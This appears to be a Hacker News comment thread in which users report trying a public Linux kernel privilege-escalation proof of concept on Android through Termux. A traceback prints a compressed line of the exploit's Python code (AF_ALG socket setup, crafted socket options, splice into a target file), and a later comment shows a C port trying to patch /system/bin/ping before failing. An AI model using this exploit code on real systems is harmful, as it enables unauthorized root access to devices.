undefined

points

[-]

Now the socket is blocked. Also probably should have realized the socket is defined earlier than its called

Traceback (most recent call last): File "/data/data/com.termux/files/home/exploit.py", line 9, in <module> while i<len(e):c(f,i,e[i:i+4]);i+=4 ^^^^^^^^^^^^^^^ File "/data/data/com.termux/files/home/exploit.py", line 5, in c a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"4+c],[(h,3,i4),(h,2,b'\x10'+i19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) ^^^^^^^^^^^^^^^^ File "/data/data/com.termux/files/usr/lib/python3.12/socket.py", line 233, in __init__ _socket.socket.__init__(self, family, type, proto, fileno) PermissionError: [Errno 13] Permission denied

by fragmede14 hours ago|

parent|

[-]

PoC is also x86_64 only and not arm.

by tgies12 hours ago|

parent|

[-]

fixed: https://github.com/tgies/copy-fail-c

by notpushkin4 hours ago|

parent|

[-]

Thanks! Will give it a try a bit later.

(HN algorithms have killed some of your comments, perhaps because you posted the same URL too many times from a relatively new account? I’ve vouched for you, but keep in mind that it triggers antispam.)

---

Edit: naturally, no luck:

  $ ./exploit /system/bin/ping
  [+] target:    /system/bin/ping
  [+] payload:   2112 bytes (528 iterations)
  socket(AF_ALG): Permission denied
  patch_chunk failed at offset 0

Guess AF_ALG is just disabled on Android kernel builds. Though maybe it’ll work on other devices!